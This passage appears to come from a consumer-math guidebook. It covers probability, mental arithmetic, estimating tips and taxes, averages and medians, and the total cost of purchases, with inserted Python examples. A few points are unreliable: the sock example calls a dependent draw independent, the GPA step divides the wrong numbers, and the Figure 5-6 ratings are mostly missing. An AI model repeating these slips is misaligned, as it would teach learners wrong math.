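    print("truncated axis:", distortion(35, 39.6, 34))
    # The same two bars drawn at full length from 0.
    print("full axis:     ", distortion(35, 39.6, 0))
    # "Your salary increase doubled": 1 percent last year, 2 percent now.
    print("salary raise:  ", change_summary(1, 2))
    print("tax rate:      ", change_summary(35, 39.6))
```

With the axis cut off at 34, the second bar is drawn 5.6 times as tall as the first, although 39.6 is only about 1.13 times 35.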


Predicting the Probable 


Many events can’t be predicted with certainty, so people look at 
the likelihood that events will occur. Enter probability. Probability, 
at its simplest, is the number of cases where an event will happen 
compared to the total number of possible outcomes. 


Probability is essential to the insurance and gaming (gambling) 
industries. It’s also used in medicine, science, and engineering — 
wherever there are complex systems and only partial knowledge. 


Most often, you are a consumer of probabilities that someone else 
develops. However, you can always do your own probability 
experiments and draw your own conclusions from the results. 


Determining probability 


As stated, probability compares the cases where an event will 
happen to the total number of possible outcomes. Probability is a 
value between 0 (it will never happen) and 1 (it’s an absolute 
certainty). 


The sun has such a good record for rising in the morning that you 
can safely assign the event a probability of 1. I have such a poor 
likelihood of becoming a rock star that you can safely assign the 
event a probability of 0. Other events fall somewhere in between. For 
example, a die has six sides with dots (pips) representing 1, 2, 3, 4, 
5, and 6. Using the formula for probability, the chances of rolling a 
1 are 


P = 1/6 


The formula looks exactly like a fraction or division problem. You 
say this as “The probability is 1 in 6 (or 1/6) that I’ll roll a 1.” You 
can also say, “My chances are 1 in 6 that I’ll roll a 1.” 


By the way, no matter what you roll, one of the numbers will 
come up. To see the probability of rolling a 1, 2, 3, 4, 5, or 6, add 
the individual probabilities. 


P = 1/6 + 1/6 + 1/6 + 1/6 + 1/6 + 1/6 = 1 


Here’s another example. Suppose you have 20 socks in a drawer 
and only 2 of them are red. What’s the probability of pulling out a 
red sock? Compare the number of desirable outcomes (getting a 
red sock) to the total number of outcomes: 


P = 2/20 
P = 1/10 


There’s 1 chance in 10 that you’ll pull out a red sock. 


What’s the probability of pulling out 2 red socks in a row? Keep in 
mind that pulling out the second red sock is an independent event 
that has nothing to do with pulling out the first red sock. The only 
consequence of pulling out the first sock is that you now have 
only 19 socks in the drawer. 


The probability of two favorable events (getting the first red 
sock and then getting the second) is the product of their two 
probabilities — 1 chance in 10 for the first sock and 1 chance in 
19 for the second sock: 


P = 1/10 x 1/19 
P = 1/190 


The chances are 1 in 190 of your pulling out 2 red socks in a row. 


Here’s one last example, and it’s a classic: What’s the probability 
that a coin will come up heads or tails? 


First, you know that, if you flip a coin, it will come up on one side 
or the other. So you figure the probability of the coin coming up 
heads (or tails) by using this formula: 

P = 1/2 


What happens if the coin comes up heads 1,000 times in a row? 
Does that mean you’re due to see tails, or is the trend toward more 
heads? In this case, the probability of the coin coming up heads is 


P = 1/2 


The probability is exactly the same every time. Independent events 
don’t “influence” each other. 


What are the odds? 


Odds are the ratio of a favorable outcome to an unfavorable 
outcome. Odds are essentially the same as probability but 
expressed differently. In rolling a die, the probability of rolling 
a 1 is 1 chance in 6, or 1/6. There’s 1 favorable outcome and 
5 unfavorable outcomes. You would express the odds in this 
scenario as 5:1, and you’d say it as “5 to 1 against.” To find out 
more about odds, head to Chapter 9. 
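

The probability and odds calculations above can be checked by counting outcomes directly, as an added example that is not part of the original text. It uses exact fractions, lists every possible way to pull two socks from the drawer, and converts a probability to "odds against"; the function names are hypothetical.

```python
from fractions import Fraction
from itertools import permutations


def probability(favorable, total):
    """Favorable outcomes compared to all possible outcomes."""
    if not 0 <= favorable <= total or total == 0:
        raise ValueError("need 0 <= favorable <= total and total > 0")
    return Fraction(favorable, total)


def die_total():
    """Add the six individual probabilities of a die's faces."""
    return sum(probability(1, 6) for _ in range(6))


def two_red_in_a_row(red=2, total=20):
    """List every ordered pair of different socks (the first sock is
    not put back) and count the pairs in which both socks are red."""
    socks = ["red"] * red + ["other"] * (total - red)
    draws = list(permutations(range(total), 2))
    hits = sum(1 for first, second in draws
               if socks[first] == "red" and socks[second] == "red")
    return Fraction(hits, len(draws))


def odds_against(p):
    """Turn a probability into (unfavorable, favorable) in lowest terms."""
    if not 0 < p <= 1:
        raise ValueError("probability must be above 0 and at most 1")
    ratio = (1 - p) / p
    return (ratio.numerator, ratio.denominator)


if __name__ == "__main__":
    print("rolling a 1:          ", probability(1, 6))
    print("all six faces added:  ", die_total())
    print("one red sock:         ", probability(2, 20))
    print("two red socks in a row:", two_red_in_a_row())
    print("odds against a 1:      %d to %d" % odds_against(probability(1, 6)))
```

Counting all 380 ordered pairs finds 2 in which both socks are red, which reduces to the 1 in 190 computed in the text.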


Chapter 4 


The Miracle of Mental Math 


In This Chapter 
Adding, subtracting, multiplying, and dividing large numbers 
Making reasonable estimates 
Looking at common statistics — averages and median values 


The handiest calculator is between your ears. Your brain is fast 
at doing math and doesn’t have any batteries to recharge. In 
day-to-day activities, mainly shopping, mental mathematics (being 
able to solve math problems without paper, a pencil, a calculator, 
or a computer) is very convenient. 


In this chapter, I give you pointers on how to improve your mental 
math capabilities and offer scenarios featuring common math problems 
that you can solve just by working things out in your head. 
I also cover estimating, a trick anyone who’s ever been shopping 
has used at one time or another, and simple statistics, just because 
they’re interesting and fun. 


Mental Math Basics 


The secret to success with mental math is to tackle simple problems 
that have good prospects for success. Although in time you could 
learn to solve very complex problems, doing so is more of a parlor 
trick than a useful skill. 


Follow this general approach to mental math: 


Memorize some numbers. Which numbers? These: 


• Your multiplication table. That’s not difficult, because 
you probably learned the table in the third grade. 


• Common equivalencies. The number of minutes in 
an hour or feet in a mile (or, alternatively, meters in a 
kilometer) is useful, too. 


Know some arithmetic basics. Get familiar with the common 
operations (addition, subtraction, multiplication, and division). 
Often, a complex-looking problem becomes a simple problem 
if you know how to break things down. For example, many 
“complex” multiplication problems are simple to solve if you 
can break them down into “multiply and then subtract” 
problems. The same is true of breaking up complex-looking 
addition problems. 


Know when to stop. Find your personal limit (in interest and 
skill) to doing certain operations. For example, I can multiply 
a four-digit number by a two-digit number in my head, but 
that’s it. For anything bigger, I’m going to the calculator. 


Adding and Subtracting on the Fly 


Quick addition and subtraction have one simple rule: Break the 
problem into parts. As you see in the following section, you can 
usually represent each number in an addition or subtraction 
problem as two smaller numbers that are easier to work with. 


One key to making this technique work is to think about problems 
a bit differently than you did in school. For example, you learned 
to add and subtract from the right, starting with the ones column. 
In mental math, you get faster results by working from the left, 
starting with the leftmost column. 


Adding numbers quickly 


To quickly add two numbers, even long ones, start at the left, at a 
column that seems comfortable to you. Break out the “easy” part 
and the “hard” part. 


For example, say you want to add 2,344 and 698. Break the hundreds 
out from the tens and ones. The equation looks like this: 


total = 2,344 + 698 
total = (2,300 + 44) + (600 + 98) 


Adding 2,300 and 600 is fairly easy; in fact it’s just like adding 23 
and 6. The answer is 2,900. 


Now, handle those other pesky items, the 44 and 98. A good 
technique is to make 98 into 100 by reducing the 44 by two. The 
equation looks like this: 

total = 44 + 98 
total = 42 + 100 


This little piece of “surgery” gives you a nice round 100 and a very 
manageable 42. Add the 100 to 2,900, giving 3,000. Now tack on the 
42. The answer is 3,042. 


For a faster solution, you could just take 2 from the 44 and turn 
698 into 700. The object is always to make “easy” numbers out of 
“hard” numbers. 


Subtracting numbers quickly 


To subtract two numbers, you use the same technique you use to 
add: You start at the left, at a column that seems comfortable to 
you, and break out the “easy” part and the “hard” part. 


For example, say you want to subtract 530 from 2,908. Break 
the hundreds from the tens and ones and then do the math on the 
resulting easier problems. The equation looks like this: 


difference = 2,908 - 530 
difference = (2,900 + 8) - (500 + 30) 
difference = (2,900 - 500) + (8 - 30) 
difference = 2,400 + 8 - 30 


At first, you’re off to an easy start. Take 500 from 2,900 and you’re 
left with 2,400. 


That leaves taking 30 from 8. Oops! Oh, my! What should you do? 
Answer: “Grab back” 100 from your partial result of 2,400 (leaving 
it at 2,300) and “give it” to the 8. Now you have 108 — 30. Subtract 
30 from 108, and you’re left with 78. 


Adding 2,300 and 78 is no problem. The answer is 2,378. 


Making Hay of Multiplication 
and Division 


Like addition and subtraction, multiplication and division are easy 
to do in your head when you alter the numbers slightly to get a 
speedy result. Apply your knowledge of the multiplication table 
whenever possible. 


Multiplying in your head 


Multiplication is easy when the numbers are nice and round, but 
it can quickly get overwhelming when they aren’t. For example, 
if four items are $5.00 each, you can pretty easily determine the 
total, because you know that 4 x 5 = 20. Ten items at $5.00 each will 
be $50.00. 


But what if the numbers aren’t nice and round? The secret is to 
round up to a number that’s easy. Then subtract the small difference 
between the rounded number and the actual starting number, 
perform the multiplication on this small difference amount, and 
then do a little subtraction. (Trust me: It sounds more complicated 
than it is!) 


Suppose, for example, that four items are $4.97 each and you want 
to find the total. 


This problem, if you’re using traditional multiplication, would 
require a calculator for many of us: 


4 x $4.97 = $19.88 


But you can do it mentally by first rounding up from $4.97 to $5.00 
and multiplying. The result is $20.00 (4 x $5.00). Then you take the 
difference between the two numbers ($0.03) and multiply, giving 
you $0.12 (4 x $0.03). Last, you subtract the multiplied difference 
from the multiplied rounded amount. 


First, multiply the “big” rounded amount. 
4 x $5.00 = $20.00 


Notice that you left off $0.03 per item? That’s okay. Multiply the 
“small” difference amount separately. 


4 x $0.03 = $0.12 


Now, simply take the $20.00 and subtract the $0.12. The answer is 
$19.88. 


You deserve a break today! Here are some easy, handy, and fast 
multiplication techniques. 


Multiplying by 10 requires only that you append a zero to the 
end and move the decimal one place to the right. For example, 
if you multiply $5.00 by 10, you get $50.00. 


Multiplying by 5 is almost as easy as multiplying by 10. Just 
multiply the quantity by 10 (append a zero and move the 
decimal point to the right) and then divide the result by 2. 
To determine what $15 x 5 is, for example, multiply $15 by 10 
($15.00 x 10 = $150.00) and divide by 2 ($150.00 ÷ 2 = $75.00). 
The answer is $75. 


Dividing in your head 


Dividing in your head appears to be a little more complicated than 
multiplying, but appearances can be deceiving. Dividing is simple. 
The general idea is to divide the “big” division problem into 
smaller “little” division problems. 


Say you want to divide 128 by 4. Fortunately, dividing by 4 is quite 
easy. 


result = 128 / 4 
result = 120/4 + 8/4 
result = 30 + 2 
result = 32 


How do you get the answer? Find the first part of 128 that can be 
divided by 4. That’s 12, the first two digits of the number 128. Then 
divide. The answer is 3. 


Next, look at the rest of 128, which is 8. It easily divides by 4, giving 
you 2. 


You may be asking yourself, “What if the numbers aren’t all nice 
and round?” Not to worry. The principle is the same. For example, 
if you need to divide 131 by 4, just expand your equation a tad. 


result = 131/4 
result = (120 + 8 + 3)/4 
result = 120/4 + 8/4 + 3/4 
result = 30 + 2 + 3/4 
result = 32 3/4 


Divide everything that comes out “even.” What’s left is a proper 
fraction. Then do another division to get a decimal fraction. In the 
example, 3/4 = 0.75, so the result of the division is 32.75. When you 
apply this principle to money, the result is $32.75. 
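
The splitting step described above can be written out as a short routine. This is an added example, not code from the book; the function names `split_for_division` and `mental_divide` are made up for illustration, and the routine always takes the largest evenly dividing chunk at each place value, which may split a number differently than you would in your head.

```python
from fractions import Fraction


def split_for_division(dividend: int, divisor: int) -> tuple[list[int], int]:
    """Split dividend into place-value chunks that divide evenly by divisor.

    Returns (chunks, leftover), where every chunk is a multiple of divisor
    and leftover is the part that does not come out "even".
    """
    if divisor <= 0 or dividend < 0:
        raise ValueError("use a positive divisor and a non-negative dividend")

    chunks = []
    remaining = dividend
    # Start at the highest place value (hundreds for a 3-digit number).
    place = 10 ** (len(str(dividend)) - 1)
    while place >= 1:
        step = divisor * place              # e.g. 4 x 10 = 40
        chunk = (remaining // step) * step  # biggest multiple of step that fits
        if chunk:
            chunks.append(chunk)
            remaining -= chunk
        place //= 10
    return chunks, remaining


def mental_divide(dividend: int, divisor: int) -> tuple[list[int], Fraction]:
    """Divide each even chunk separately; return the parts and the fraction left."""
    chunks, leftover = split_for_division(dividend, divisor)
    parts = [chunk // divisor for chunk in chunks]
    return parts, Fraction(leftover, divisor)


if __name__ == "__main__":
    for dividend, divisor in [(128, 4), (131, 4)]:
        chunks, leftover = split_for_division(dividend, divisor)
        parts, fraction = mental_divide(dividend, divisor)
        total = sum(parts) + fraction
        print(f"{dividend} / {divisor}: chunks {chunks}, leftover {leftover}, "
              f"parts {parts} + {fraction} = {float(total)}")
```
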

The fastest, easiest division is when you’re dividing by 10 or 5: 


Dividing by 10 just requires moving a decimal point one place 
to the left. In that way, 27.5 (for example) becomes 2.75. If the 
number doesn’t show a decimal point (7 for example), it really 
is there but not notated. Think of 7 as 7.0 — now you see a 
decimal point. When you move it one place to the left, the 
answer is 0.7. 


To divide by 5, first divide by 10 and then double the result. 
To divide 27.5 by 5, for example, first divide it by 10 (27.5 ÷ 
10 = 2.75) and then double the result (2.75 x 2 = 5.50). 


It all looks confusing at first, but practice really helps. 


Estimating with Ease 


Estimating is the process of finding an approximate amount. The 
amount might be weight, volume, distance, time, or money. The 
result may not be perfect, but it’s not expected to be. An estimation, 
although not precise, is good enough to get the job done. 


When you take your car to the mechanic, you'll typically get an 
estimate of charges — the approximate (not the exact) sum of 
the costs of parts and labor. You also get an estimate of charges 
when you ask a craftsperson to do painting, drywall work, or a 
fence installation. When you estimate, you’re in good company. 
Corporations, economists, and governments make estimates all the 
time. 


Apply the following simple techniques in estimating: 


When possible, compare something known to what is 
unknown. Known items could be parts of your body (for 
linear measurement), size of a bottle (for liquids), size of a 
box (for solid products), and so forth. 


Use your body as a quick length estimator. The distance 
across the palm is about 4 inches (about 10 centimeters). 
The distance from the nose to the tip of the finger with the 
arm outstretched is about 36 inches (90+ centimeters). 


Use a trick. For example, in the United States, convenience 
stores have height scales painted on the door frames. It’s 
considered a method of estimating the height of a fleeing 
armed robber, but it works equally well in giving you a quick 
estimate of your teenager’s height. 


Round up. While you’re shopping for groceries, round the 
prices up to the next 10 cents or dollar. As you add up your 
purchases, you'll get a good idea of what your bill will be. 
On a quick trip to the grocery store, you might think, “Let’s 
see. A head of lettuce is about $1.40 and a soft drink is about 
$1.25. That’s $2.65. I have $3.00 in my pocket. I can buy these 
things.” 


If all else fails, make a guess. If your guess is based on any 
kind of reasoning, you may come close. 


Do not perspire over minor details. “Don’t sweat the small 
stuff.” An estimate is an approximation. 


In the following sections, I cover some scenarios when estimating 
comes in really handy. 


The rule of thumb for estimating is a practical one: If you can 
measure and calculate, then measure and calculate. If you 
can’t measure and calculate, then estimate. 


Estimating sales tax and value added tax (VAT) 


Many states in the U.S. charge sales tax, and those states may 
have local variants that increase the tax. A safe estimate is to allow 
10 percent of an item’s purchase price for sales tax. 


For example, if you buy a $70.00 item at the hardware store, you 
can determine what 10 percent of that amount would be by moving 
the decimal one place to the left (see the earlier section “Dividing 
in your head”). The tax will be approximately $7.00. 


Elsewhere around the world, people pay a value added tax (VAT), 
which hovers around 20 percent, being higher in some countries 
and lower in others. 


To estimate VAT, follow the same approach you use to estimate 
sales tax. Determine 10 percent by moving the decimal one place 
to the left in an item’s price and then double the result; that 
gives you 20 percent. If an item costs €70.00, the VAT will be 
approximately €14.00. 


Estimating tips 


Diners in the United States typically tip about 15 percent of the 
sum on the check. Calculating a 15 percent tip is quick and easy, 
using the strategies I discuss earlier in this chapter. If, for example, 
the check is $34.57, drop the 57 cents to get $34. Determine what 
10 percent of $34 is by moving the decimal one place to the left 
($3.40). Divide that number by two to get the 5 percent ($1.70) and 
then add the two results ($3.40 and $1.70) together. Your 15 percent 
tip? About $5.00. 


Estimating guests at a banquet 


Do you want to estimate how many guests are attending a sit-down 
dinner at a wedding? Say you sit down at your table and count 
10 seats available. (Banquet tables are usually round tables called 
rounds, and the guests are seated at “round of 8” or “round of 10” 
tables.) Stand up for a moment. Count the tables in the room. If 
you see 20 tables, a little mental multiplication tells you that the 
banquet has been set up for 200 guests (20 “round of 10” tables). 
Chances are that most seats will be filled, so the wedding has 
about 200 guests. 


Doing Simple Cerebral Statistics 


Professional statisticians spend a lot of time working with complex 
mathematics. However, most people aren’t statisticians, yet they 
might still like to develop a statistic or two. The two handy stats 
you can do in your head are the average and the median. 


Figuring averages 


An average is the result of adding up numbers in a collection and 
then dividing that result by the number of items in the collection. 
The average is officially known as the arithmetic mean. Two averages 
are fairly easy to calculate using mental math — bowling average 
and grade point average. 


Bowling average 


Your bowling average is the total number of points you’ve bowled 
in a few games, divided by the number of games you’ve bowled. 


Imagine that you bowl once a week in a league that meets 12 times. 
If you know your multiplication table up to the 12s and if your 
league bowls the typical three games in one night, you can see 
that you bowl a total of 36 games (12 x 3 = 36). To get your average 
score for all those games, you add up all your scores and divide 
the total by 36. 


Frankly, that’s a lot of adding, and life is short. Why not just average 
your scores for the number of games you bowled in one night? 
(Besides, in many leagues, handicaps are calculated based on the 
average of the first night’s bowling.) 


Say, for example, that you bowl 150, 175, and 133 on the first night 
of the league. To find your average without lifting a pencil, do the 
following: 


1. Add the scores. 


Break the numbers into more easily added combos, an 
addition trick I share in the earlier section “Adding numbers 
quickly.” Here, for example, you “take” 25 from 175 and add 
it to 133, giving you 158. That reduces 175 to 150. Add 150 
and 150 to get 300, and then just add 300 to 158 to get 458. 


total = 150 + 175 + 133 
total = 150 + (175 - 25) + (133 + 25) 
total = 150 + (150) + (158) 
total = 300 + 158 
total = 458 


The total score is 458 points. 


2. Divide 458 by the number of games, which, in this 
example, is 3 games. 


You notice that 450 is a nice round number, so you decide 
to break the fraction into two fractions, which lets you 
divide 450 by 3 and then separately divide 8 by 3. 


Dividing 450 by 3 is easy. That division results in 150. The 
clumsy part is dividing 8 by 3, because the answer is “2 and 
something.” Drop the “and something.” Bowling averages 
are typically rounded down. 


average = 458/3 
average = 450/3 + 8/3 
average = 150 + 2 2/3 
average = 152 


Your average for the night is 152 points. 


Grade point average 


Many countries determine an average score for grades, but the 
systems vary. In the U.S., the grade point average (GPA) is a 
regular issue for students. Each letter grade (A, B, C, and D) is 
assigned a numerical equivalent (4, 3, 2, and 1, respectively). 


To calculate a GPA in your head, do the following: 


1. Convert the grades to numbers. 


Say you’re taking 4 courses and your grades are A, A, C, 
and D. The numeric equivalents are 4, 4, 2, and 1, 
respectively. 


2. Add the numbers up. 


This task is easy because most people don’t take a lot of 
courses in one semester or quarter. The result is 11. 


3. Now divide by the number of courses — 4 in this 
example. 


When you divide 11 by 4, you get a number that is greater 
than 2 and less than 3. Actually, it’s 2 with a remainder of 3. 
Divide 2 by 3 to get 0.75. Your GPA is 2.75, or about a C+. 


GPA = (4 + 4 + 2 + 1)/4 


Beware of the fallacy of averages (see the statistics section in 
Chapter 3). Most averages work best with a large number of items 
in a sample. Averages aren’t as reliable with a small sample. For 
example, you could say, “I have one child who’s four feet tall and 
one who’s six feet tall. Their average height is five feet.” That’s 
mathematically correct, but it’s meaningless. 


Managing medians 


The median is the value that separates the upper half of the items 
in a sample from the lower half. It’s not the same as the average. 


You can find the median by looking at the members of a group, 
arranging the values in order, and then counting down through 
the list until you reach the middle number. If the list has an even 
number of values, you take the average of the two central numbers. 

Here’s an example. Say you want the median age for your kid’s 
Little League team, which has 11 players. You arrange the ages 
from least to greatest and count down to the middle, the 6th value 
in the list. That’s your median. If your child’s team has 12 players, 
the median age would be an average of the 6th and 7th values. 


Often, you need to interpret, not create, a median. Imagine a 
neighborhood has 11 households. In 10 households, the annual 
income is $10,000; the 11th household has 1 millionaire with an 
annual income of $1,000,000. The average income is $100,000, but 
that doesn’t mean that everyone’s rich. The median income is 
$10,000. 


You can do both of the calculations in your head by just looking 
at a list and counting the items. Simply count up from the lowest- 
value item to find the median. 


Math for Everyday Activities 


The 5th Wave By Rich Tennant 


“We all know it’s a pie, Helen. 
There’s no need to pipe the 
number 3.14 on the top.” 


In this part... 


In this part, you go on a tour, but unfortunately not to 
any exotic places. You apply real-life math to real-life 
places — your home and stores around town. 


With the math tips and tricks I share in these chapters, 
you'll be able to make smart choices at the grocery store 
and when shopping for other items. You'll be able to whip 
up things in the kitchen (even when you have to adjust a 
recipe), improve your nutrition and health, and take care 
of yard projects and home maintenance. The last chapter 
in this part takes you all over town and features a full 
workup of a modern problem: “Should I drive across town 
to save 10 cents per gallon on gasoline?” 


Chapter 5 


Let's Make a Deal! Math You Use When Shopping 


In This Chapter 
Figuring out the actual cost of the items you buy 
Evaluating how much coupons, discounts, and sales really save you 
Looking at the costs associated with different payment methods 
Becoming aware of the impacts your shopping choices have 


The practice of going to a marketplace is very old, so when you 
shop you're in the same company as citizens of ancient 
civilizations. In fact, historians think that Trajan’s Market in Rome 
is the world’s oldest shopping mall. You can bet that those shoppers 
wanted the same thing you do: to get what they wanted for the 
best price. Of course, shopping isn’t always about bargains; it’s 
about making satisfying choices, too. 


The math you use when shopping is the same whether you live 
lean or high on the hog. It helps you make your choices. Although 
much of the math in this chapter takes place in the grocery store, 
the principles apply to shopping in all places. (And if a shopping 
trip just isn’t a shopping trip unless you stop for lunch, too, flip to 
Chapter 9 for the math you use when dining out.) 


Determining Actual Cost 


Determining the cost of a purchase involves more than just looking 
at the price. The true cost is a combination of factors. Fortunately, 
the math is easy: Just figure out the various costs and add ’em up! 


Finding the total cost of acquisition 


The total cost of acquisition (TCA) is defined as all the costs 
associated with buying something. The TCA encompasses more 
than just the price; it includes taxes, delivery charges, and 
installation. Also included are the transportation costs — the 
money you spend to go get the item or to have it delivered. 


Think of that washer/dryer set you’ve had your eye on. It’s on sale, 
which is great, but you won’t just pay the sale price. Taxes, delivery, 
installation, and the cost of new gas fittings (if you need them) will 
send the final, bottom-line price up. The common result? Sticker 
shock, where the total price you pay is a little (or a lot) higher than 
the advertised price. 


Chances are excellent that you are already figuring TCA for purchases. 
For little things, you can do the calculations in your head. For big 
items, such as a car, you want to use a pad and pencil, a calculator, 
and/or a spreadsheet application. Following are some common 
scenarios. 


Chasing a sale — Is it worth it? 


Suppose you can buy a TV locally for $200.00, but you see that 
another store 32 miles away has it on sale for $190.00. As it turns 
out, your car gets 16 miles per gallon, so the trip will take 4 gallons 
of gasoline. If gas is $4.00 per gallon, is going to the second store 
worth it? To determine that, you add up the cost of the TV and the 
cost of the gas you'll use to get there (see Figure 5-1). 


Item                         Store 1    Store 2 
Television                   $200.00    $190.00 
Gasoline (4 gallons)           $0.00     $16.00 
Total cost of acquisition    $200.00    $206.00 


Illustration by Wiley, Composition Services Graphics 


Figure 5-1: Calculating whether a sale price far away is a better deal than a 
non-sale price closer to home. 


As you can see, the answer is a big “No!” If you add in the cost of 
gasoline, you spend more money chasing the “bargain” than you 
save. 


Comparing taxed versus non-taxed items 

Some people avoid state sales tax by crossing a state line to shop 
in a state that doesn’t have the tax. Buying over the Internet has 
the same effect. In this example, Store 2, where the item costs less 
but is 32 miles away, is in a no-sales-tax state. Add up the costs, 
and you can see that avoiding the sales tax means you save more 
by going to Store 2 (see Figure 5-2). 


Item                         Store 1    Store 2 
Television                   $200.00    $190.00 
Tax (8 percent)               $16.00      $0.00 
Gasoline (4 gallons)           $0.00     $16.00 
Total cost of acquisition    $216.00    $206.00 


Figure 5-2: Determining the better deal when sales tax is figured in. 


Say that both stores charge the same sales tax rate (8 percent, for 
example). That means that the only factor affecting savings is the 
amount of gasoline you'll use. 


To improve the savings, you can “spread” the gasoline cost over 
several items. In the example shown in Figure 5-3, you determine 
that, as long as you’re going to get another television, you may 
as well buy a DVD player to go along with it, and (what the heck) 
how about buying that gas grill you like? If all these items are 
less expensive at Store 2, you can enjoy some serious savings 
by buying several items in one trip, since the same gasoline cost 
spreads over several purchases. 


Item                         Store 1    Store 2 
Television                   $200.00    $190.00 
Gas grill                    $300.00    $260.00 
DVD player                   $100.00     $85.00 
SUBTOTAL                     $600.00    $535.00 
Tax (8 percent)               $48.00     $42.80 
Gasoline (4 gallons)           $0.00     $16.00 
Total cost of acquisition    $648.00    $593.80 


Figure 5-3: Spreading out the cost of gas over multiple items. 


This scenario isn’t rare. You see this sort of buying every day at 
big box stores (also known as superstores or megastores). 


Figuring the total cost of ownership 


The total cost of ownership (TCO) is the estimated sum of direct 
and indirect costs of buying something. Direct costs are pretty 
much what you pay for an item; indirect costs come up later. 

Indirect costs tend to occur again and again and again. The example 
in Figure 5-4 shows the real annual TCO for an entry-level 
automobile. Notice how much the total cost changes when you 
figure in both the direct and indirect costs. 


Item                                      Monthly        Monthly Direct 
                                          Direct Cost    and Indirect Costs 
Auto loan, $15,000.00 
  48 month term/10 percent interest       $380.44        $380.44 
Registration ($150.00 per year)                          $12.50 
Insurance                                                $105.00 
Maintenance ($60.00 every other month)                   $30.00 
Gasoline                                                 $173.20 
Total cost of ownership                   $380.44        $701.14 


Figure 5-4: Factoring in both direct and indirect costs. 


The math is easy: Just figure out the costs and add ’em up! The 
car payment isn’t that bad (only $380.44), but the TCO ($701.14) 
may cause you some pain. (And this doesn’t even include 
depreciation — the concept that the selling price or trade-in price 
of a car goes down a little every day.) 


There are two valuable lessons here. First, with TCO analysis, you 
see the true cost of continued ownership, and second, such 
exercises get you thinking about costs you may have ignored. 


Calculating TCO is useful for what economists call durable goods 
(long-lasting items such as cars, furniture, appliances, and home 
electronics). You’d never try to calculate TCO for a vacation, 
because doing so just doesn’t make any sense. With a vacation, 
the money is spent; you have the memories and the photographs, 
but no long-term cost of ownership. Accountants call spent money 
sunk costs. The best cost analysis for a vacation consists of planning 
for every expense and comparing prices for major expenses such 
as airfare and hotels. Jump over to Chapter 9 to see how it’s done. 


Uncovering hidden costs 


Hidden costs are usually expenses not included in the purchase 
price of an item. Mostly, nobody’s trying to hide them; they are 
simply the costs of supplies, installation, maintenance, or minor 
recurring fees. However, there are other costs that merchants 
would prefer you didn’t know about. These are expenses that 
aren’t prominent in sales literature. The old saying that “the big 
type giveth and the small type taketh away” applies. Those costs 
come to light later, often at a point where you feel it’s too late to 
back out of the deal. 


Places where hidden costs are common include the following: 


Cruises: Cruise lines advertise their rates as “all inclusive,” 
which is true as far as your stateroom, meals, and some 
activities go. But you pay extra for onshore excursions, 
massages, an Internet connection, and cocktails. 


Airfare: Until recently, the full price of an airline ticket in the 
United States wasn’t revealed until the purchasing process 
was almost complete. That is, the advertised price was lower 
than the real price. Various taxes and fees weren’t included, 
and some still aren’t. You can expect many other new, strange 
fees, too, including a fee if you want priority boarding and 
charges to check in luggage. Figure 5-5 shows how a $378.00 
fare is really a $420.80 fare. The excise tax is part of the 
advertised fare, but all the other fees are still separate. 


Bank charges: Banks in the United States have long invited 
controversy about fees for monthly service, overdrafts, and 
overdraft protection. The trend in legislation is to demand 
greater transparency. 


Unbundling: Unbundling is separating the price of goods or 
services from a single charge into separate charges. Every 
buyer expects something to be “not included” with the 
purchase, but unbundling is a merchant’s deliberate attempt 
to show lower prices by separating (that is, not including) 
some fees from the basic cost of the product. For example, 
you can see unbundling when you buy smartphones, e-readers, 
and tablet computers. The basic “box” is nothing other than 
the device, and you have to buy screen protectors, cases, and 
so forth, separately. 


Cost and Payment Summary 


Base Fare $351.62 
+ Excise Taxes $26.38 


Advertised Fare $378.00 


+ Segment Fee $14.80 
+ Passenger Facility Fee $18.00 
+ Security Fee $10.00 


Total Payment: $420.80 


Figure 5-5: Airfare fee summary: Notice the additional charges. 


Hidden cost math is very simple. Locate the hidden costs, if you 
can, and add them up. 


total cost = advertised cost + hidden costs 


In the airline ticket example, this is the calculation of hidden costs: 
total cost = advertised cost + hidden costs 
total cost = (base fare + excise tax) + 
(segment fee + facility fee + security fee) 
total cost = ($351.62 + $26.38) + ($14.80 + $18.00 + $10.00) 
total cost = ($378.00) + ($42.80) 
total cost = $420.80 


Making Tradeoffs: A Fun Balancing Act 


Consumers in many countries have abundant choice in what merchandise 
they buy. Some common choices include 


A choice between a name brand product and the generic 
product (also called a store brand or private label product). 


A choice between organic and non-organic products or locally 
grown produce and produce from another country. 


A choice between a product made in your own country and 
one made on foreign shores. 


When faced with many choices, consider the tradeoffs. A tradeoff is 
a buying scenario where you decide to give up one thing in order 
to get another. Typical tradeoffs might be 


Price versus name brand: When you’re buying food, you may 
opt for a generic product because you think the name brand 
costs too much. Conversely, you may go for a more expensive, 
name-brand television because you have confidence in that 
manufacturer’s products. 


Quality versus price: You may decide to buy the more 
expensive suit with a well-known designer label because 
you're confident it’s well made and will last a long time. 


Other factors versus price: You think, “The product made in 
my country costs more, but I feel patriotic by supporting it. 
I’ll buy it instead of the foreign product.” Or you think, “The 
organic produce costs more, but I think it’s healthier, and it’s 
locally grown. I'll buy it, despite its higher price.” 


Price is almost always a factor in making tradeoffs because it’s 
easy to quantify the money. If price is the only factor in a tradeoff, 
the lower price almost always wins. The subjective factors in a 
tradeoff — like the value you place on organically grown food or 
your feelings about buying products made in your own country — 
are important, too, even though they’re very difficult to quantify. 


Don’t be afraid to quantify subjective factors. One way to do it is 
to assign a number from -10 to +10 for each consideration, with -1 
through -10 representing the downside of making the purchase, 
and +1 through +10 representing the upside. For example, say it’s 
your 20th wedding anniversary, and you’re thinking of getting your 
ever-lovin’ honey a nice gift. Figure 5-6 shows what your reasoning 
might look like, with numeric ratings. In this instance, when you 
add up the ratings, the gift gets a +2. Buy it. 


Item                                     Rating 
This gift will cost $200.00              -3 
But it's our 20th anniversary            6 
But I only make $200.00 per week 
But my spouse will be impressed 
And I can charge it 
But I have to pay off the charge 
What the heck, you don't live forever 
Tradeoff value 


Figure 5-6: Assigning numeric values to the intangibles. 


Where to buy is another, but different, kind of tradeoff. See the 
section “Determining Where to Shop.” 


Buying in Quantity: A Good Deal? 


Buying in quantity allows you to take advantage of quantity pricing. 
With quantity pricing, a merchant offers a lower price if you buy 
more of a product. Many people love such pricing and like to call it 
a discount (which it isn’t). 


Buying a quantity of a product costs more, but the unit price is 
lower. To figure the unit price, you divide the total price by the 
number of units: 


unit price = total price / number of units 




Compare two extremes of unit pricing. A single bottle of water at a 
convenience store might sell for $1.00, making its unit price $1.00: 


unit price = $1.00 / 1 
unit price = $1.00 


By contrast, you can buy a case of bottled water at a giant 
warehouse store for $4.45. If the case contains 35 bottles of water, 
its unit price is about $0.13 per bottle — quite a price difference 
compared to the convenience store bottle! 


